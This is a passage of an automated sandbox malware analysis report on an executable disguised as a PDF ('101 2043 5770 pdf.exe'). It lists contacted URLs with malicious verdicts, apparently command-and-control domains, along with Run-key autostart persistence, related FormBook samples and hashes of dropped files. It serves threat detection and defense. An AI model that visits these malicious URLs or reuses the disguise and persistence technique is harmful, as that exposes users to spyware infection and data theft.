http://www.sacksmantenimiento.store/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.mrawkward.xyzReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000007.00000000.2149784147.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.come	explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityY	101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.blucretebistro.com/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.a2zglobalimports.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cq0jt.sbsReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.bedbillionaire.com/kmge/www.mrawkward.xyz	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.bedbillionaire.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.msn.com/I	explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	false	URL Reputation: safe	unknown
http://www.cq0jt.sbs/kmge/www.hhe-crv220.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.landfillequip.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-c	101 2043 5770 pdf.exe	false	URL Reputation: safe	unknown
http://www.mrawkward.xyz/kmge/www.landfillequip.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000007.00000002.4589318233.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2131057244.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4597265016.0000000007B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.szexvideokingyen.sbs/kmge/www.agritamaperkasaindonesia.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.hhe-crv220.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sejasuapropriachefe.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sacksmantenimiento.store	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 00000007.00000002.4595914565.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gsolartech.com/kmge/	explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.blucretebistro.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kickssoccercamp.com/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.bedbillionaire.com/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.kickssoccercamp.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.icvp5o.xyz/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://sectigo.com/CPS0	101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	false	URL Reputation: safe	unknown
https://crash-reports.mozilla.com/submit?id=	ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.bedbillionaire.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.shearwaterpembrokeshire.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603845014.0000000010B09000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4594200448.0000000003DD9000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icvp5o.xyzReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.blucretebistro.com/kmge/www.gsolartech.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.a2zglobalimports.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.szexvideokingyen.sbsReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com-	explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icvp5o.xyz/kmge/www.bedbillionaire.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.shearwaterpembrokeshire.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.gsolartech.com	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hhe-crv220.comReferer:	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kickssoccercamp.com/kmge/www.cq0jt.sbs	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://powerpoint.office.comEMd	explorer.exe, 00000007.00000000.2149784147.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4601846350.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.a2zglobalimports.com/kmge/	explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
204.11.56.48	www.landfillequip.com	Virgin Islands (BRITISH)		40034	CONFLUENCE-NETWORK-INCVG	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501602
Start date and time:	2024-08-30 07:25:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	101 2043 5770 pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1068/19@14/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 68% Number of executed functions: 70 Number of non-executed functions: 324
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:25:58	API Interceptor	55x Sleep call for process: powershell.exe modified
01:26:00	API Interceptor	9138579x Sleep call for process: explorer.exe modified
01:26:41	API Interceptor	8371133x Sleep call for process: ipconfig.exe modified
07:26:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf C:\Users\user\101 2043 5770 pdf.exe
07:26:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf C:\Users\user\101 2043 5770 pdf.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
204.11.56.48	e8997f96b91ab5ea1fed555a7d62369a8307b0cfcbd0e32c5e9a7e430ab42240.zip	Get hash	malicious	Djvu	Browse	ex3mall.com/test1/get.php?pid=394D2EB3C744B4E911D2D42FC85033CF&first=true
	Shipping Documents 7896424100.exe	Get hash	malicious	FormBook	Browse	www.overboda.net/mv7u/
	PRE-ALERT HTHC22031529.exe	Get hash	malicious	FormBook	Browse	www.overboda.net/mv7u/
	Order 81307529516.LZ.exe	Get hash	malicious	FormBook	Browse	www.overboda.net/mv7u/
	e98.dll	Get hash	malicious	Unknown	Browse	www.marmarademo.com/include/extend.php
	e98.dll	Get hash	malicious	Unknown	Browse	www.marmarademo.com/include/extend.php
	22K9006S-BA-ISO-1001_D79 1065_8 C4 (002) EHT ISO drawings.pdf.hta	Get hash	malicious	FormBook, GuLoader	Browse	www.overboda.net/43gt/
	TENDER PRODUCTS AND TECHNICAL SPECIFICATIONS.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.overboda.net/43gt/
	blood Gas analyzer tender.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.overboda.net/43gt/
	SYN-M021012010530.bat	Get hash	malicious	FormBook, GuLoader	Browse	www.overboda.net/43gt/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CONFLUENCE-NETWORK-INCVG	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	66.81.203.200
	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	208.91.197.39
	Payment Advice.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	z11SOAAUG2408.exe	Get hash	malicious	FormBook	Browse	66.81.203.200
	COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	DN.exe	Get hash	malicious	FormBook	Browse	66.81.203.135
	http://www.empoweryourretirement.com	Get hash	malicious	Unknown	Browse	208.91.196.253
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	199.191.50.83
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	199.191.50.83

Process:	C:\Users\user\Desktop\101 2043 5770 pdf.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2148960
Entropy (8bit):	7.025214153664025
Encrypted:	false
SSDEEP:	49152:tl2eQMj254Xra+qk6okjyjxKtyEAqVG13lwUWQdHt:76euw
MD5:	5E8E7DD95B3E592A44A3C61B7F8D91F8
SHA1:	D829B9E1E99087D94F527F359184F65B608190C5
SHA-256:	8D278608D1D1C4C5B6C048020C23351E75203066AF1AE1E63C5C5AC0170CD3DE
SHA-512:	A9846B798E89596DA64CFEB844A5DCB3EEFA983972CC4433CB6861464A386900A9035428187E5AE4E8B666A70DF7C147F48884C512EE5823BCD1275072FC8D60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.:...TI..TI..TI..WH..TI..PH..TI..QH,.TI...I..TII.UH..TI..UI.TI..WH..TI..PH..TI..TI..TI..QHG.TIJ.TH..TIJ.VH..TI................................PE..d...P..f.........."....)............`..........@..............................&.......!...`.........................................PF!.\....F!.......#.^H...`"....... .`.....&.<...`%..T....................'..(... $..@............@...............................text............................... ..`.managed............................ ..`hydrated .... ...........................rdata.......@... ..................@..@.data........`!......*..............@....pdata.......`"......H..............@..@.rsrc...^H....#..J...Z..............@..@.reloc..<.....&....... .............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\DB1

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3t2u5h2o.oqr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
